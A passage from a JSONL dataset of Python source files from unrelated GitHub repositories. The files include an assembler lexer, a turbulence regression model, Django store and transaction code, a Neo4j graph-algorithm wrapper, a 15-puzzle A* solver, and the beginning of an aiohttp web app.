t.value[0:2].lower() == \"0x\":\n\t\tt.value = int(t.value, 16)\n\telif t.value[0:2].lower() == \"0b\":\n\t\tt.value = int(t.value[2:], 2)\n\telse:\n\t\tt.value = int(t.value, 10)\n\tif t.lexer.data:\n\t\tt.lexer.instr_count += 1\n\t\t# if inside the data segment, immediate values encode to data\n\treturn t\t\n\ndef t_STRING(t):\n\t'\".*\"'\n\tt.value = t.value[1:-1] # strips off the quotation marks.\n\t# Ascii characters are stored 2 to a word, so increase the instruction count\n\t# by 1/2 of the total number of characters (including the null terminator),\n\t# rounded up \n\tt.lexer.instr_count += math.ceil((len(t.value) + 1) / 2)\n\treturn t\n\n# Labels\ndef t_LABEL_DEF(t):\n\tr\"[a-zA-Z][_a-zA-Z0-9]*\\:\"\n\t# on finding a label, add the label and the memory location it points to\n\tlabel = t.value[:len(t.value)-1] # strips :\n\tif label in t.lexer.symbol_table:\n\t\tprint('ERROR: Duplicate label on line', t.lexer.lineno)\n\tt.lexer.symbol_table[label] = t.lexer.instr_count\n\t\nt_LABEL = r'[a-zA-Z][_a-zA-Z0-9]*'\n\n# Keywords\nt_TEXT = r'\\.text'\n\ndef t_DATA(t):\n\tr'\\.data'\n\tt.lexer.data = True\n\treturn t\n\n# Lexer constants\ndef t_newline(t):\n\tr'\\n+'\n\tt.lexer.lineno += len(t.value)\n\t\nt_ignore = ' \\t'\n\t\t\ndef t_error(t):\n\tprint('ERROR: Illegal character \"' + t.value + '\" on line', t.lexer.lineno)\n\tt.lexer.skip(1)\n\n# lexing\nlexer = lex.lex()\n# instruction count allows the lexer to track the memory location for labels\nlexer.instr_count = 0\n# symbol table is a dictionary, with labels as keys and memory pointers as values \nsymbol_table = dict()\nlexer.data = False\nlexer.symbol_table = symbol_table\n","repo_name":"yashton/processor","sub_path":"asm/asmlex.py","file_name":"asmlex.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34139638625","text":"\"\"\"\nOffshore Macro-Meteorological Model from:\n\n@article{sadot1992forecasting,\n title={Forecasting optical turbulence strength on the basis of macroscale meteorology and aerosols: models and validation},\n author={Sadot, Dan and Kopeika, Norman S},\n journal={Optical Engineering},\n volume={31},\n number={2},\n pages={200--212},\n year={1992},\n publisher={SPIE}\n}\n\"\"\"\nimport os\nimport sys\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\n\nfrom otbench.benchmark.models.regression.base_model import BaseRegressionModel\nfrom otbench.utils import apply_fried_height_adjustment, add_temporal_hour, add_temporal_hour_weight\n\n\nclass MacroMeteorologicalModel(BaseRegressionModel):\n \"\"\"A model which predicts the Cn2 value using macro-meteorological parameters.\"\"\"\n\n def __init__(self,\n name: str,\n target_name: str,\n timezone: str,\n obs_lat: float,\n obs_lon: float,\n air_temperature_col_name: str,\n humidity_col_name: str,\n wind_speed_col_name: str,\n time_col_name: str,\n temporal_hour_col_name: str = \"temporal_hour\",\n temporal_hour_weight_col_name: str = \"temporal_hour_weight\",\n height_of_observation: Union[float, None] = None,\n enforce_dynamic_range: bool = True,\n constant_adjustment: bool = True,\n use_log10: bool = True,\n **kwargs):\n super().__init__(name, target_name, **kwargs)\n self.timezone = timezone\n self.obs_lat = obs_lat\n self.obs_lon = obs_lon\n self.air_temperature_col_name = air_temperature_col_name\n self.humidity_col_name = humidity_col_name\n self.wind_speed_col_name = wind_speed_col_name\n self.time_col_name = time_col_name\n self.temporal_hour_col_name = temporal_hour_col_name\n self.temporal_hour_weight_col_name = temporal_hour_weight_col_name\n self.height_of_observation = height_of_observation\n self.enforce_dynamic_range = enforce_dynamic_range\n self.constant_adjustment = constant_adjustment\n self.use_log10 = use_log10\n\n def train(self, X: pd.DataFrame, y: Union[pd.DataFrame, pd.Series, np.ndarray]):\n \"\"\"Maintain the same interface as the other models.\"\"\"\n pass\n\n def predict(self, X: pd.DataFrame):\n \"\"\"Generate predictions from the model using an input DataFrame.\"\"\"\n\n # add temporal hour and temporal hour weight\n if self.temporal_hour_col_name not in X.columns:\n X = add_temporal_hour(X,\n name=self.name,\n timezone=self.timezone,\n obs_lat=self.obs_lat,\n obs_lon=self.obs_lon,\n time_col_name=self.time_col_name,\n temporal_hour_col_name=self.temporal_hour_col_name)\n if self.temporal_hour_weight_col_name not in X.columns:\n X = add_temporal_hour_weight(X,\n temporal_hour_col_name=self.temporal_hour_col_name,\n temporal_hour_weight_col_name=self.temporal_hour_weight_col_name)\n\n X_ = X.loc[X[self.air_temperature_col_name].notna() & X[self.humidity_col_name].notna() &\n X[self.wind_speed_col_name].notna() & X[self.temporal_hour_weight_col_name].notna()].copy()\n\n T = X_[self.air_temperature_col_name] # temperature in [C]\n T = T + 273.15 # convert to Kelvin\n U = X_[self.wind_speed_col_name] # Wind Speed in [m/s]\n RH = X_[self.humidity_col_name] # Relative Humidity [%]\n W = X_[self.temporal_hour_weight_col_name] # Temporal Hour Weight\n\n w = 3.8e-14 # coefficient for temporal hour weight W\n t = 2e-15 # coefficient for temperature (Kelvin) T\n rh = -2.8e-15 # coefficient for relative humidity RH\n rh2 = 2.9e-17 # coefficient for relative humidity squared RH^2\n rh3 = -1.1e-19 # coefficient for relative humidity cubed RH^3\n u = -2.5e-15 # coefficient for wind speed U\n u2 = 1.2e-15 # coefficient for wind speed squared U^2\n u3 = -8.5e-17 # coefficient for wind speed cubed U^3\n c = -5.3e-13 # final coefficient\n\n mm_prediction = pd.Series((w * W + t * T + rh * RH + rh2 * (RH * RH) + rh3 * (RH * RH * RH) + u * U + u2 *\n (U * U) + u3 * (U * U * U) + c),\n index=X.index,\n name=self.name)\n\n if self.enforce_dynamic_range:\n X[self.name] = mm_prediction\n X.loc[(X[self.wind_speed_col_name] > 10) | ((X[self.air_temperature_col_name] < 9) |\n (X[self.air_temperature_col_name] > 35)) |\n ((X[self.humidity_col_name] < 14) | (X[self.humidity_col_name] > 92)), self.name] = np.nan\n\n mm_prediction = X[self.name].values\n X.drop(columns=[self.name], inplace=True)\n\n if len(mm_prediction[~np.isnan(mm_prediction)]) > 0:\n if self.constant_adjustment & (min(mm_prediction[~np.isnan(mm_prediction)]) < 0):\n constant_adjustment = min(mm_prediction[~np.isnan(mm_prediction)]) * -1\n mm_prediction = mm_prediction + \\\n constant_adjustment + \\\n sys.float_info.epsilon\n else:\n mm_prediction[mm_prediction <= 0] = np.nan\n\n # convert from model reference height to height of observation\n if self.height_of_observation is not None:\n mm_prediction = apply_fried_height_adjustment(cn2=mm_prediction,\n observed=15.0,\n desired=self.height_of_observation)\n\n if self.use_log10:\n return np.log10(mm_prediction)\n return mm_prediction\n","repo_name":"CDJellen/otbench","sub_path":"otbench/benchmark/models/regression/macro_meteorological.py","file_name":"macro_meteorological.py","file_ext":"py","file_size_in_byte":6103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37713895533","text":"import requests\nimport os\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.shortcuts import get_object_or_404\nfrom .my_cb import my_circle_breaker\nfrom .models import User\nfrom .serializers import UserSerializer\nfrom .rabbit import Uses_Q\nfrom datetime import datetime\n\n\norder_url = os.environ.get(\"ORDER_URL\", \"volosatov-order.herokuapp.com\")\norder_cb = my_circle_breaker(3, 60)\nwarranty_cb = my_circle_breaker(3, 60)\n\nclass UserView(APIView):\n def get(self, request):\n users = User.objects.all()\n serializer = UserSerializer(users, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n json_data = request.data\n serializer = UserSerializer(data=json_data)\n if serializer.is_valid(raise_exception=True):\n user_saved = serializer.save()\n return Response(status=201)\n return Response(status=400)\n\n\nclass StoreOrders(APIView):\n def get(self, request, user_id):\n user = get_object_or_404(User, user_uuid=user_id)\n orders = order_cb.do_request(f\"http://{order_url}/api/v1/orders/{user.user_uuid}\", http_method='get')\n #orders = requests.get(f\"http://{order_url}/api/v1/orders/{user.user_uuid}\")\n if orders.status_code == 404:\n return Response({'message': f'user with user_uuid {user_id} not found in orders'}, status=404, content_type='application/json')\n if orders.status_code == 503:\n return orders\n return Response(orders.data, content_type=\"application/json\")\n\n\nclass StorePurchase(APIView):\n def post(self, request, user_id):\n user = get_object_or_404(User, user_uuid=user_id)\n json_data = request.data\n model = json_data.get('model')\n size = json_data.get('size')\n #TODO new_order as orders\n new_order = order_cb.do_request(f\"http://{order_url}/api/v1/orders/{user.user_uuid}\", http_method='post', context={\"model\": model, \"size\": size})\n #new_order = requests.post(f\"http://{order_url}/api/v1/orders/{user.user_uuid}\",\n # {\"model\": model, \"size\": size}).json()\n headers = {\"Location\": f\"/{new_order.data.get('orderUid')}\"}\n if new_order.status_code == 404:\n return Response({'message': 'cant create new order'}, status=404, content_type='application/json')\n if new_order.status_code == 503:\n return new_order\n return Response(status=201, headers=headers)\n\n\nclass StoreOrderDetail(APIView):\n def get(self, request, user_id, order_id):\n user = get_object_or_404(User, user_uuid=user_id)\n order_detail = order_cb.do_request(f\"http://{order_url}/api/v1/orders/{user_id}/{order_id}\", http_method='get')\n #order_detail = requests.get(f\"http://{order_url}/api/v1/orders/{user_id}/{order_id}\")\n if order_detail.status_code == 404:\n return Response({'message': f'cant find order with order_id {order_id} '}, status=404, content_type='application/json')\n if order_detail.status_code == 503:\n return order_detail\n return Response(order_detail.data, content_type=\"application/json\")\n\n\nclass StoreRefund(APIView):\n def delete(self, request, user_id, order_id):\n order = order_cb.do_request(f\"http://{order_url}/api/v1/orders/{order_id}\", http_method='delete')\n #order = requests.delete(f\"http://{order_url}/api/v1/orders/{order_id}\")\n if order.status_code == 404:\n return Response({'message': f'cant delete order with order_id {order_id}'}, status=404, content_type='application/json')\n if order.status_code == 503:\n return order\n return Response(status=order.status_code)\n\n\nclass StoreWarranty(APIView):\n def post(self, request, user_id, order_id):\n user = get_object_or_404(User, user_uuid=user_id)\n warranty = warranty_cb.do_request(f\"http://{order_url}/api/v1/orders/{order_id}/warranty\", http_method='post')\n if warranty.status_code == 404:\n return Response({'message': f'cant find warranty on order with order_id {order_id} '}, status=404, content_type='application/json')\n if warranty.status_code == 503:\n #TODO add request to queue order_id user_id datetime.now\n with Uses_Q() as mq:\n mq.send({'time': str(datetime.now()), 'user_id': str(user_id), 'order_id': str(order_id)})\n return Response({'message': f'warranty is unavailable, but your request is on queue'})\n #warranty = requests.post(f\"http://{order_url}/api/v1/orders/{order_id}/warranty\").json()\n\n warranty = warranty.data\n #TODO for req in\n old_results = []\n with Uses_Q() as mq:\n for req in mq.take():\n result = warranty_cb.do_request(f\"http://{order_url}/api/v1/orders/{req.get('order_id')}/warranty\",\n http_method='post')\n req.update(result.data)\n old_results.append(req)\n #добавил старые результаты для видимости\n warranty.update({\"orderUid\": order_id, 'old_results': old_results})\n return Response(warranty, content_type=\"application/json\")\n","repo_name":"Sega7Genesis/microservices-Sega7Genesis","sub_path":"service_store/store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5928102273","text":"import glob\nimport sqlite3\nimport re\nfrom tools.configs import ConfigsParams\nfrom tools.apptests import AppTests\n\n\nclass Database():\n \"\"\"Classe représant une base de donnée\"\"\"\n def __init__(self):\n self.name = None\n\n \n def open(self, db_name):\n path_test = glob.glob(db_name)\n if path_test:\n self.name = db_name\n \n\n def select(self, sql, db_name):\n \"\"\"Select commands for sql\"\"\"\n try: \n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n cursor.execute(sql)\n rows = cursor.fetchall()\n return rows\n except Exception as e:\n print(\"[Erreur]\", e)\n conn.rollback()\n finally:\n conn.close()\n\n def actions(self, sql, db_name):\n \"\"\"for all other sql commands\"\"\"\n try: \n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n cursor.execute(sql)\n conn.commit()\n except Exception as e:\n print(\"[Erreur]\", e)\n conn.rollback()\n finally:\n conn.close()\n","repo_name":"NicolasDuquesne2/Entity-finder-Empyrion","sub_path":"tools/databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"341580208","text":"class BaseGraph:\n def __init__(self, driver, direction, config=None):\n if config is None:\n config = {}\n\n self.driver = driver\n self.direction = direction\n self.node_label = config.get(\"node_label\", \"Node\")\n self.relationship_type = config.get(\"relationship_type\", \"CONNECTED\")\n self.graph = config.get(\"graph\", \"heavy\")\n self.identifier_property = config.get(\"identifier_property\", \"id\")\n\n add_node_query = \"\"\"\\\n MERGE (:`%s` {`%s`: {value} })\n \"\"\"\n\n def add_node(self, value):\n with self.driver.session() as session:\n query = self.add_node_query % (self.node_label, self.identifier_property)\n session.run(query, {\"value\": value})\n\n add_nodes_query = \"\"\"\\\n UNWIND {values} AS value\n MERGE (:`%s` {`%s`: value })\n \"\"\"\n\n def add_nodes_from(self, values):\n with self.driver.session() as session:\n query = self.add_nodes_query % (self.node_label, self.identifier_property)\n session.run(query, {\"values\": values})\n\n add_edge_query = \"\"\"\\\n MERGE (node1:`%s` {`%s`: {node1} })\n MERGE (node2:`%s` {`%s`: {node2} })\n MERGE (node1)-[:`%s`]->(node2)\n \"\"\"\n\n def add_edge(self, node1, node2):\n with self.driver.session() as session:\n query = self.add_edge_query % (\n self.node_label,\n self.identifier_property,\n self.node_label,\n self.identifier_property,\n self.relationship_type\n )\n session.run(query, {\"node1\": node1, \"node2\": node2})\n\n add_edges_query = \"\"\"\\\n UNWIND {edges} AS edge\n MERGE (node1:`%s` {`%s`: edge[0] })\n MERGE (node2:`%s` {`%s`: edge[1] })\n MERGE (node1)-[:`%s`]->(node2)\n \"\"\"\n\n def add_edges_from(self, edges):\n with self.driver.session() as session:\n query = self.add_edges_query % (\n self.node_label,\n self.identifier_property,\n self.node_label,\n self.identifier_property,\n self.relationship_type\n )\n session.run(query, {\"edges\": [list(edge) for edge in edges]})\n\n number_of_nodes_query = \"\"\"\\\n MATCH (:`%s`)\n RETURN count(*) AS numberOfNodes\n \"\"\"\n\n def number_of_nodes(self):\n with self.driver.session() as session:\n query = self.number_of_nodes_query % self.node_label\n return session.run(query).peek()[\"numberOfNodes\"]\n\n betweenness_centrality_query = \"\"\"\\\n CALL algo.betweenness.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, centrality\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, centrality\n \"\"\"\n\n def betweenness_centrality(self):\n with self.driver.session() as session:\n query = self.betweenness_centrality_query % self.identifier_property\n params = self.base_params()\n result = {row[\"node\"]: row[\"centrality\"] for row in session.run(query, params)}\n return result\n\n closeness_centrality_query = \"\"\"\\\n CALL algo.closeness.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n improved: {wfImproved},\n graph: {graph}\n })\n YIELD nodeId, centrality\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, centrality\n \"\"\"\n\n def closeness_centrality(self, wf_improved=True):\n with self.driver.session() as session:\n params = self.base_params()\n params[\"wfImproved\"] = wf_improved\n query = self.closeness_centrality_query % self.identifier_property\n\n result = {row[\"node\"]: row[\"centrality\"] for row in session.run(query, params)}\n return result\n\n harmonic_centrality_query = \"\"\"\\\n CALL algo.closeness.harmonic.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, centrality\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, centrality\n \"\"\"\n\n def harmonic_centrality(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.harmonic_centrality_query % self.identifier_property\n result = {row[\"node\"]: row[\"centrality\"] for row in session.run(query, params)}\n return result\n\n pagerank_query = \"\"\"\\\n CALL algo.pageRank.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph},\n iterations: {iterations},\n dampingFactor: {dampingFactor}\n })\n YIELD nodeId, score\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, score\n \"\"\"\n\n def pagerank(self, alpha, max_iter):\n with self.driver.session() as session:\n params = self.base_params()\n params[\"iterations\"] = max_iter\n params[\"dampingFactor\"] = alpha\n\n query = self.pagerank_query % self.identifier_property\n result = {row[\"node\"]: row[\"score\"] for row in session.run(query, params)}\n return result\n\n triangle_count_query = \"\"\"\\\n CALL algo.triangleCount.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, triangles, coefficient\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, triangles, coefficient\n \"\"\"\n\n def triangles(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.triangle_count_query % self.identifier_property\n result = {row[\"node\"]: row[\"triangles\"] for row in session.run(query, params)}\n return result\n\n def clustering(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.triangle_count_query % self.identifier_property\n result = {row[\"node\"]: row[\"coefficient\"] for row in session.run(query, params)}\n return result\n\n triangle_query = \"\"\"\\\n CALL algo.triangleCount({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph},\n write: false\n })\n \"\"\"\n\n def average_clustering(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.triangle_query\n result = session.run(query, params)\n return result.peek()[\"averageClusteringCoefficient\"]\n\n lpa_query = \"\"\"\\\n CALL algo.labelPropagation.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, label\n MATCH (n) WHERE id(n) = nodeId\n RETURN label, collect(n.`%s`) AS nodes\n \"\"\"\n\n def label_propagation(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.lpa_query % self.identifier_property\n\n for row in session.run(query, params):\n yield set(row[\"nodes\"])\n\n shortest_path_query = \"\"\"\\\n MATCH (source:`%s` {`%s`: {source} })\n MATCH (target:`%s` {`%s`: {target} })\n CALL algo.shortestPath.stream(source, target, {propertyName}, {\n direction: {direction},\n graph: {graph}\n }) \n YIELD nodeId, cost\n MATCH (n) WHERE id(n) = nodeId\n RETURN n.`%s` AS node, cost\n \"\"\"\n\n def shortest_weighted_path(self, source, target, weight):\n with self.driver.session() as session:\n params = self.base_params()\n params[\"source\"] = source\n params[\"target\"] = target\n params[\"propertyName\"] = weight\n\n query = self.shortest_path_query % (\n self.node_label,\n self.identifier_property,\n self.node_label,\n self.identifier_property,\n self.identifier_property\n )\n\n result = [row[\"node\"] for row in session.run(query, params)]\n return result\n\n def shortest_path(self, source, target):\n with self.driver.session() as session:\n params = self.base_params()\n params[\"source\"] = source\n params[\"target\"] = target\n params[\"propertyName\"] = None\n\n query = self.shortest_path_query % (\n self.node_label,\n self.identifier_property,\n self.node_label,\n self.identifier_property,\n self.identifier_property\n )\n\n result = [row[\"node\"] for row in session.run(query, params)]\n return result\n\n connected_components_query = \"\"\"\\\n CALL algo.unionFind.stream({nodeLabel}, {relationshipType}, {\n direction: {direction},\n graph: {graph}\n })\n YIELD nodeId, setId\n MATCH (n) WHERE id(n) = nodeId\n RETURN setId, collect(n.`%s`) AS nodes\n \"\"\"\n\n def connected_components(self):\n with self.driver.session() as session:\n params = self.base_params()\n query = self.lpa_query % self.identifier_property\n\n for row in session.run(query, params):\n yield set(row[\"nodes\"])\n\n def base_params(self):\n return {\n \"direction\": self.direction,\n \"nodeLabel\": self.node_label,\n \"relationshipType\": self.relationship_type,\n \"graph\": self.graph\n }\n","repo_name":"ReinhardHsu/networkx-neo4j","sub_path":"nxneo4j/base_graph.py","file_name":"base_graph.py","file_ext":"py","file_size_in_byte":9317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"22682067871","text":"import heapq\nimport copy\nimport datetime\n\nGOAL = [[1, 5, 9, 13], [2, 6, 10, 14], [3, 7, 11, 15], [4, 8, 12, 0]]\nBLOCK = []\n# 4个方向\ndirection = [[0, 1], [0, -1], [1, 0], [-1, 0]]\n\n# OPEN表\nOPEN = []\n\n# 节点的总数\nSUM_NODE_NUM = 0\n\n\n# 状态节点\nclass State(object):\n def __init__(self, gn=0, hn=0, state=None, hash_value=None, par=None):\n '''\n 初始化\n :param gn: gn是初始化到现在的距离\n :param hn: 启发距离\n :param state: 节点存储的状态\n :param hash_value: 哈希值,用于判重\n :param par: 父节点指针\n '''\n self.gn = gn\n self.hn = hn\n self.fn = self.gn + self.hn\n self.child = [] # 孩子节点\n self.par = par # 父节点\n self.state = state # 局面状态\n self.hash_value = hash_value # 哈希值\n\n def __lt__(self, other): # 用于堆的比较,返回距离最小的\n return self.fn < other.fn\n\n def __eq__(self, other): # 相等的判断\n return self.hash_value == other.hash_value\n\n def __ne__(self, other): # 不等的判断\n return not self.__eq__(other)\n\n\ndef manhattan_dis(cur_node, end_node):\n '''\n 计算曼哈顿距离\n :param cur_state: 当前状态\n :return: 到目的状态的曼哈顿距离\n '''\n cur_state = cur_node.state\n end_state = end_node.state\n dist = 0\n N = len(cur_state)\n for i in range(N):\n for j in range(N):\n if cur_state[i][j] == end_state[i][j]:\n continue\n num = cur_state[i][j]\n if num == 0:\n x = N - 1\n y = N - 1\n else:\n x = num / N # 理论横坐标\n y = num - N * x - 1 # 理论的纵坐标\n dist += (abs(x - i) + abs(y - j))\n\n return dist\n\n\ndef test_fn(cur_node, end_node):\n return 0\n\n\ndef generate_child(cur_node, end_node, hash_set, open_table, dis_fn):\n '''\n 生成子节点函数\n :param cur_node: 当前节点\n :param end_node: 最终状态节点\n :param hash_set: 哈希表,用于判重\n :param open_table: OPEN表\n :param dis_fn: 距离函数\n :return: None\n '''\n if cur_node == end_node:\n heapq.heappush(open_table, end_node)\n return\n num = len(cur_node.state)\n for i in range(0, num):\n for j in range(0, num):\n if cur_node.state[i][j] != 0:\n continue\n for d in direction: # 四个偏移方向\n x = i + d[0]\n y = j + d[1]\n if x < 0 or x >= num or y < 0 or y >= num: # 越界了\n continue\n # 记录扩展节点的个数\n global SUM_NODE_NUM\n SUM_NODE_NUM += 1\n\n state = copy.deepcopy(cur_node.state) # 复制父节点的状态\n state[i][j], state[x][y] = state[x][y], state[i][j] # 交换位置\n h = hash(str(state)) # 哈希时要先转换成字符串\n if h in hash_set: # 重复了\n continue\n hash_set.add(h) # 加入哈希表\n gn = cur_node.gn + 1 # 已经走的距离函数\n hn = dis_fn(cur_node, end_node) # 启发的距离函数\n node = State(gn, hn, state, h, cur_node) # 新建节点\n cur_node.child.append(node) # 加入到孩子队列\n heapq.heappush(open_table, node) # 加入到堆中\n\n\ndef getOperate(s, p):\n \"\"\"\n :param p:父节点\n :param s:子节点\n :return: 0,1,2,3: 上下左右\n \"\"\"\n i = 0\n j = 0\n for i in range(4):\n for j in range(4):\n if p[i][j] == 0:\n break\n if p[i][j] == 0:\n break\n if i > 0 and s[i - 1][j] == 0:\n return 'left'\n elif i < 3 and s[i + 1][j] == 0:\n return 'right'\n elif j > 0 and s[i][j - 1] == 0:\n return 'up'\n elif j < 3 and s[i][j + 1] == 0:\n return 'down'\n\n\ndef print_path(node):\n '''\n 输出路径\n :param node: 最终的节点\n :return: None\n '''\n num = node.gn\n\n # def show_block(block):\n # print(\"---------------\")\n # for b in block:\n # print(b)\n\n stack = [] # 模拟栈\n while node.par is not None:\n stack.append(getOperate(node.state,node.par.state))\n node = node.par\n return stack\n\n\ndef A_start(start, end, distance_fn, generate_child_fn, time_limit=10):\n '''\n A*算法\n :param start: 起始状态\n :param end: 终止状态\n :param distance_fn: 距离函数,可以使用自定义的\n :param generate_child_fn: 产生孩子节点的函数\n :param time_limit: 时间限制,默认10秒\n :return: None\n '''\n root = State(0, 0, start, hash(str(BLOCK)), None) # 根节点\n end_state = State(0, 0, end, hash(str(GOAL)), None) # 最后的节点\n if root == end_state:\n print(\"start == end !\")\n\n OPEN.append(root)\n heapq.heapify(OPEN)\n\n node_hash_set = set() # 存储节点的哈希值\n node_hash_set.add(root.hash_value)\n start_time = datetime.datetime.now()\n while len(OPEN) != 0:\n top = heapq.heappop(OPEN)\n if top == end_state: # 结束后直接输出路径\n print(\"OK!\")\n return 1,print_path(top)\n # 产生孩子节点,孩子节点加入OPEN表\n generate_child_fn(cur_node=top, end_node=end_state, hash_set=node_hash_set,\n open_table=OPEN, dis_fn=distance_fn)\n cur_time = datetime.datetime.now()\n # 超时处理\n # if (cur_time - start_time).seconds > time_limit:\n # print(\"Time running out, break !\")\n # print(\"Number of nodes:\", SUM_NODE_NUM)\n # return -1\n\n print(\"No road !\") # 没有路径\n return -1,0\n\n\ndef getPath(block):\n global OPEN,SUM_NODE_NUM\n OPEN = [] # 这里别忘了清空\n global BLOCK\n BLOCK = block\n # BLOCK = []\n # BLOCK = [[5, 2, 6, 9], [1, 10, 14, 7], [3, 11, 0, 12], [4, 8, 15, 13]]\n SUM_NODE_NUM = 0\n i = 0\n j = 0\n for i in range(4):\n for j in range(4):\n if BLOCK[i][j] is None:\n BLOCK[i][j] = 0\n break\n if BLOCK[i][j] is None:\n break\n print(\"in\",BLOCK)\n start_t = datetime.datetime.now()\n # 这里添加5秒超时处理,可以根据实际情况选择启发函数\n flag,operate = A_start(BLOCK, GOAL, manhattan_dis, generate_child, time_limit=10)\n end_t = datetime.datetime.now()\n BLOCK[i][j] = None\n print(operate)\n return operate\n#\n# BLOCK = [[1, 5, 10, 9], [2, 6, 0, 13], [3, 7, 11, 14], [4, 8, 12, 15]]\n# op = getPath(BLOCK)","repo_name":"xu-hanwen/BigHub","sub_path":"15-Digital/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":6718,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"7831250369","text":"from django.db import models\nfrom account.models import Account\nfrom category.models import Category\n\n# Create your models here.\n\nclass Transaction(models.Model):\n account = models.ForeignKey(Account, null=False, db_index=True, on_delete=models.CASCADE)\n amount = models.DecimalField(max_digits=8, decimal_places=2, null=False)\n description = models.CharField(null=False, blank=True, max_length=255)\n note = models.TextField(null=True, blank=True)\n date = models.DateTimeField(null=False)\n category = models.ForeignKey(Category, null=False, default=\"UNCATEGORIZED\", db_index=True, on_delete=models.CASCADE)\n is_reccuring = models.BooleanField(default=False)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n \n class Meta:\n indexes = [\n models.Index(fields=['account'], name='index_transactions_on_account')\n ]","repo_name":"ipierre3/Personal-Finance-App","sub_path":"backend/transaction/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34764189482","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 7 19:21:28 2022\r\n\r\n@author: bkmcc\r\n\"\"\"\r\n\"\"\" module to load the County data from Colorado \"\"\"\r\n\r\n\r\n\r\n\r\nimport os\r\nimport requests\r\nimport pandas as pd\r\ndef load_CO_county_data(Logger):\r\n \"\"\"function to load county lat / long data \"\"\"\r\n\r\n co_pathName = os.getcwd()\r\n co_fileName = \"Colorado_County_Boundaries.csv\"\r\n Logger.info(f\"CO county data - start load\")\r\n Logger.debug(f\"filepath = {co_pathName}\")\r\n\r\n files = [file for file in os.listdir(os.getcwd())]\r\n\r\n if co_fileName not in files:\r\n print(f\"Colorado County file not in folder. Please remedy!!\")\r\n raise AttributeError\r\n co_DF = pd.read_csv(os.path.join(co_pathName, co_fileName))\r\n co_DF = co_DF[[\"COUNTY\", \"CENT_LAT\", \"CENT_LONG\"]]\r\n\r\n co_DF['COUNTY'] = co_DF['COUNTY'].str.lower()\r\n\r\n Logger.debug(f\"CO county data - data loaded / return to MAIN\")\r\n\r\n return co_DF\r\n","repo_name":"efugikawa/3006_final","sub_path":"FP_CO_county_load.py","file_name":"FP_CO_county_load.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27874720135","text":"import functools\nimport time\nimport uuid\n\nimport aiohttp_jinja2\nimport voluptuous as vol\nfrom aiohttp import web\n\nfrom pymash import db\nfrom pymash import events\nfrom pymash import loggers\nfrom pymash import models\nfrom pymash import type_aliases as ta\nfrom pymash import utils\n\n_COOKIE_VISITED = 'visited'\n\n_CACHE_LEADERS_IN_SECONDS = 5\n\n\ndef _cache_coroutine_by_time(seconds):\n def decorator(view):\n cache = {}\n\n async def cached_view(*args, **kwargs):\n now = _floor_to_full_nearest_multiply(int(time.time()), seconds)\n if now not in cache:\n loggers.web.info('%s cache miss', view.__name__)\n cache.clear()\n result = await view(*args, **kwargs)\n cache[now] = result\n else:\n loggers.web.info('%s cache hit', view.__name__)\n return cache[now]\n\n return functools.update_wrapper(cached_view, view)\n\n return decorator\n\n\n@utils.log_time(loggers.web)\n@aiohttp_jinja2.template('leaders.html')\nasync def show_leaders(request: web.Request) -> ta.DictOrResponse:\n repos = await _cached_find_active_repos(request)\n return {\n 'repos': repos,\n }\n\n\n@_cache_coroutine_by_time(_CACHE_LEADERS_IN_SECONDS)\nasync def _cached_find_active_repos(request):\n repos = await db.find_active_repos_order_by_rating(request.app['db_engine'])\n return repos\n\n\nclass _PostGameInput:\n valid_id = vol.And(str, vol.Coerce(int))\n valid_score = vol.And(str, vol.Coerce(int))\n\n class Keys:\n white_id = 'white_id'\n black_id = 'black_id'\n white_score = 'white_score'\n black_score = 'black_score'\n hash_ = 'hash'\n\n schema = vol.Schema(\n {\n Keys.white_id: valid_id,\n Keys.black_id: valid_id,\n Keys.white_score: valid_score,\n Keys.black_score: valid_score,\n Keys.hash_: str,\n },\n 